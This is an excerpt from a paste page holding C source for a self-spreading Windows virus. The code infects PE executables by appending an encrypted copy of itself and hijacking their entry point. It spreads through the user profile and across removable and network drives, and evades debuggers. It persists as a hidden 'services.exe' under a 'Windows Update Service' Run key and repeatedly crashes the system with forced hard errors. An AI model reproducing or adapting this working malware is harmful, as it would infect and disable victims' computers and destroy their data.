  831.         if(hMap)
  832.         {
  833.             MappedFile=MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);
  834.  
  835.             if(MappedFile)
  836.             {
  837.                 pIDH=(PIMAGE_DOS_HEADER)MappedFile;
  838.                 pINH=(PIMAGE_NT_HEADERS)((PUCHAR)MappedFile+pIDH->e_lfanew);
  839.  
  840.                 pISH=(PIMAGE_SECTION_HEADER)(pINH+1);
  841.                 pISH=&pISH[pINH->FileHeader.NumberOfSections-1];
  842.  
  843.                 ptr=(PUCHAR)MappedFile+pISH->PointerToRawData+pISH->SizeOfRawData;
  844.  
  845.                 pISH->Misc.VirtualSize+=SectionSize;
  846.                 pISH->SizeOfRawData=Align(pISH->SizeOfRawData+SectionSize,pINH->OptionalHeader.FileAlignment);
  847.                 pISH->Characteristics|=IMAGE_SCN_MEM_EXECUTE;
  848.  
  849.                 pINH->OptionalHeader.SizeOfImage=pISH->VirtualAddress+pISH->Misc.VirtualSize;
  850.  
  851.                 CodeAddress=ptr;
  852.                 <span class="searchlite">Virus</span>Address=CodeAddress+CodeSize;
  853.  
  854.                 memcpy(CodeAddress,PeType==PeDll ? (PVOID)Dll<span class="searchlite">Virus</span>Code:Exe<span class="searchlite">Virus</span>Code,CodeSize); // Write the <span class="searchlite">virus</span> code to the file
  855.                 memcpy(<span class="searchlite">Virus</span>Address,<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size); // Write the <span class="searchlite">virus</span> body to the file
  856.  
  857.                 // Fill up placeholders
  858.  
  859.                 for(i=0;i<CodeSize;i++)
  860.                 {
  861.                     if(CodeAddress[i]==0xb8 && *(PULONG)&CodeAddress[i+1]==0x41414141)
  862.                     {
  863.                         *(PULONG)&CodeAddress[i+1]=pINH->OptionalHeader.AddressOfEntryPoint;
  864.                     }
  865.  
  866.                     if(CodeAddress[i]==0xb8 && *(PULONG)&CodeAddress[i+1]==0x42424242)
  867.                     {
  868.                         *(PULONG)&CodeAddress[i+1]=(ULONG)<span class="searchlite">Virus</span>Address-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile;
  869.                     }
  870.  
  871.                     if(CodeAddress[i]==0xb8 && *(PULONG)&CodeAddress[i+1]==0x43434343)
  872.                     {
  873.                         *(PULONG)&CodeAddress[i+1]=<span class="searchlite">Virus</span>Size;
  874.                     }
  875.                 }
  876.  
  877.                 // Encrypt the virus
  878.  
  879.                 Key=pINH->FileHeader.TimeDateStamp;
  880.                 RC4(<span class="searchlite">Virus</span>Address,<span class="searchlite">Virus</span>Size,&Key);
  881.  
  882.                 pINH->OptionalHeader.AddressOfEntryPoint=(ULONG)CodeAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile; // Set the entry point
  883.                 wcscpy((PWSTR)(pIDH+1),<span class="searchlite">VIRUS</span>_MARKER); // Write the infection marker to the DOS stub
  884.  
  885.                 // Compute the new checksum
  886.  
  887.                 if(CheckSumMappedFile(MappedFile,NewSize,&OldChecksum,&NewChecksum))
  888.                 {
  889.                     pINH->OptionalHeader.CheckSum=NewChecksum; // Update the checksum
  890.                 }
  891.  
  892.                 FlushViewOfFile(MappedFile,0); // Flush the changes into file
  893.                 UnmapViewOfFile(MappedFile); // Unmap the file
  894.             }
  895.         }
  896.     }
  897.  
  898.     NtClose(hMap);
  899.     NtClose(hFile);
  900. }
  901.  
  902. void __fastcall SearchFile(PWSTR Directory)
  903. {
  904.     HANDLE hFind;
  905.     WIN32_FIND_DATA FindData;
  906.  
  907.     wchar_t SearchName[1024],FullPath[1024];
  908.     LARGE_INTEGER delay;
  909.  
  910.     delay.QuadPart=(__int64)-10*10000;
  911.  
  912.     memset(SearchName,0,sizeof(SearchName));
  913.     memset(&FindData,0,sizeof(WIN32_FIND_DATA));
  914.  
  915.     swprintf(SearchName,L"%s\\*",Directory);
  916.  
  917.     hFind=FindFirstFile(SearchName,&FindData);
  918.  
  919.     if(hFind!=INVALID_HANDLE_VALUE)
  920.     {
  921.         while(FindNextFile(hFind,&FindData))
  922.         {
  923.             if(FindData.cFileName[0]=='.')
  924.             {
  925.                 continue;
  926.             }
  927.              
  928.             memset(FullPath,0,sizeof(FullPath));
  929.             swprintf(FullPath,L"%s\\%s",Directory,FindData.cFileName);
  930.  
  931.             if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
  932.             {
  933.                 SearchFile(FullPath);
  934.             }
  935.  
  936.             else
  937.             {
  938.                 InfectFile(FullPath);
  939.             }
  940.  
  941.             NtDelayExecution(FALSE,&delay);
  942.         }
  943.  
  944.         FindClose(hFind);
  945.     }
  946. }
  947.  
  948. void NTAPI TlsCallback(PVOID Module,ULONG Reason,PVOID Context)
  949. {
  950.     HKEY hKey;
  951.     PLDR_DATA_TABLE_ENTRY Ldr;
  952.  
  953.     BOOLEAN IsAdmin,bl;
  954.  
  955.     PPEB Peb=(PPEB)__readfsdword(0x30);
  956.     ULONG_PTR DebugPort=0;
  957.  
  958.     if(Reason!=DLL_PROCESS_ATTACH)
  959.     {
  960.         return;
  961.     }
  962.      
  963.     if(Peb->BeingDebugged)
  964.     {
  965.         NtTerminateProcess(NtCurrentProcess(),0);
  966.         while(1);
  967.     }
  968.  
  969.     if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
  970.     {
  971.         if(DebugPort)
  972.         {
  973.             NtTerminateProcess(NtCurrentProcess(),0);
  974.             while(1);
  975.         }
  976.     }
  977.  
  978.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
  979.     IsAdmin=NT_SUCCESS(RtlAdjustPrivilege(20,TRUE,FALSE,&bl));
  980.  
  981.     ExpandEnvironmentStrings(IsAdmin ? L"%windir%\\services.exe":L"%temp%\\services.exe",<span class="searchlite">Virus</span>Path,60);
  982.     CopyFile(Ldr->FullDllName.Buffer,<span class="searchlite">Virus</span>Path,FALSE); // Copy the <span class="searchlite">virus</span> to temp folder
  983.  
  984.     SetFileAttributes(<span class="searchlite">Virus</span>Path,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
  985.  
  986.     // Add the <span class="searchlite">virus</span> to registry
  987.  
  988.     if(!RegCreateKey(IsAdmin ? HKEY_LOCAL_MACHINE:HKEY_CURRENT_USER,L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey))
  989.     {
  990.         RegSetValueEx(hKey,L"Windows Update Service",0,REG_SZ,(PUCHAR)<span class="searchlite">Virus</span>Path,sizeof(<span class="searchlite">Virus</span>Path));
  991.         RegCloseKey(hKey);
  992.     }
  993. }
  994.  
  995. __declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK TlsCallbackAddress[]={TlsCallback,NULL};
  996.  
  997. DWORD WINAPI ZeroX(PVOID p)
  998. {
  999.     BOOLEAN bl;
  1000.     LARGE_INTEGER delay;
  1001.  
  1002.     ULONG Response;
  1003.      
  1004.     PPEB Peb=(PPEB)__readfsdword(0x30);
  1005.     ULONG_PTR DebugPort=0;
  1006.  
  1007.     delay.QuadPart=(__int64)-10*10000;
  1008.  
  1009.     while(1)
  1010.     {
  1011.         if(Peb->BeingDebugged)
  1012.         {
  1013.             break;
  1014.         }
  1015.  
  1016.         if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
  1017.         {
  1018.             if(DebugPort)
  1019.             {
  1020.                 break;
  1021.             }
  1022.         }
  1023.  
  1024.         NtDelayExecution(FALSE,&delay);
  1025.     }
  1026.  
  1027.     RtlAdjustPrivilege(19,TRUE,FALSE,&bl);
  1028.     NtRaiseHardError(0xC000026A,0,0,NULL,OptionShutdownSystem,&Response);
  1029.  
  1030.     while(1);
  1031. }
  1032.  
  1033. DWORD WINAPI InfectUserProfile(PVOID p)
  1034. {
  1035.     wchar_t UserProfile[1024];
  1036.     LARGE_INTEGER delay;
  1037.  
  1038.     delay.QuadPart=(__int64)-600000*10000;
  1039.     GetEnvironmentVariable(L"userprofile",UserProfile,1024); // Get the path of user profile
  1040.      
  1041.     while(1)
  1042.     {
  1043.         SearchFile(UserProfile); // Search for files to infect
  1044.         NtDelayExecution(FALSE,&delay);
  1045.     }
  1046. }
  1047.  
  1048. DWORD WINAPI InfectDrives(PVOID p)
  1049. {
  1050.     ULONG DriveType;
  1051.     wchar_t drives[1024],*str;
  1052.  
  1053.     LARGE_INTEGER delay;
  1054.  
  1055.     delay.QuadPart=(__int64)-600000*10000;
  1056.  
  1057.     while(1)
  1058.     {
  1059.         memset(drives,0,sizeof(drives));
  1060.  
  1061.         GetLogicalDriveStrings(sizeof(drives),drives); // Get all drives
  1062.         str=drives;
  1063.  
  1064.         while(*str)
  1065.         {
  1066.             DriveType=GetDriveType(str); // Check the drive type
  1067.  
  1068.             // Infect removable and network drives
  1069.  
  1070.             if(DriveType==DRIVE_REMOVABLE || DriveType==DRIVE_REMOTE)
  1071.             {
  1072.                 SearchFile(str); // Search for files to infect
  1073.             }
  1074.  
  1075.             str+=wcslen(str)+1; // Get the next drive
  1076.         }
  1077.  
  1078.         NtDelayExecution(FALSE,&delay);
  1079.     }
  1080. }
  1081.  
  1082. int WINAPI wWinMain(HINSTANCE hInst,HINSTANCE hPrev,LPWSTR lpCmdLine,int nCmdShow)
  1083. {
  1084.     HANDLE hFile;
  1085.     ULONG Response,read,op;
  1086.  
  1087.     BOOLEAN bl;
  1088.  
  1089.     SYSTEMTIME Time;
  1090.     LARGE_INTEGER delay;
  1091.  
  1092.     CreateMutex(NULL,TRUE,L"{CFC9E0B8-3AB0-4FB0-9301-230E623A09FD}");
  1093.  
  1094.     if(GetLastError()==ERROR_ALREADY_EXISTS)
  1095.     {
  1096.         NtTerminateProcess(NtCurrentProcess(),0);
  1097.         while(1);
  1098.     }
  1099.  
  1100.     hFile=CreateFile(<span class="searchlite">Virus</span>Path,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
  1101.  
  1102.     if(hFile!=INVALID_HANDLE_VALUE)
  1103.     {
  1104.         <span class="searchlite">Virus</span>Size=GetFileSize(hFile,NULL);
  1105.         <span class="searchlite">Virus</span>File=VirtualAlloc(NULL,<span class="searchlite">Virus</span>Size,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
  1106.  
  1107.         if(<span class="searchlite">Virus</span>File)
  1108.         {
  1109.             if(!ReadFile(hFile,<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size,&read,NULL))
  1110.             {
  1111.                 NtClose(hFile);
  1112.                 return -1;
  1113.             }
  1114.         }
  1115.  
  1116.         NtClose(hFile);
  1117.         VirtualProtect(<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size,PAGE_READONLY,&op); // Protect the <span class="searchlite">virus</span> data
  1118.     }
  1119.  
  1120.     <span class="searchlite">Virus</span>FileChecksum=ComputeHash(<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size);
  1121.  
  1122.     // Create worker threads
  1123.      
  1124.     CreateThread(NULL,0,ZeroX,NULL,0,NULL);
  1125.     CreateThread(NULL,0,InfectUserProfile,NULL,0,NULL);
  1126.     CreateThread(NULL,0,InfectDrives,NULL,0,NULL);
  1127.  
  1128.     delay.QuadPart=(__int64)-10*10000;
  1129.  
  1130.     while(1)
  1131.     {
  1132.         memset(&Time,0,sizeof(SYSTEMTIME));
  1133.         GetLocalTime(&Time);
  1134.  
  1135.         if(!Time.wMinute && !Time.wSecond)
  1136.         {
  1137.             RtlAdjustPrivilege(19,TRUE,FALSE,&bl);
  1138.             NtRaiseHardError(0xC000001E,0,0,NULL,OptionShutdownSystem,&Response);
  1139.         }
  1140.  
  1141.         NtDelayExecution(FALSE,&delay);
  1142.     }
  1143. }
Tags: rohitab.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement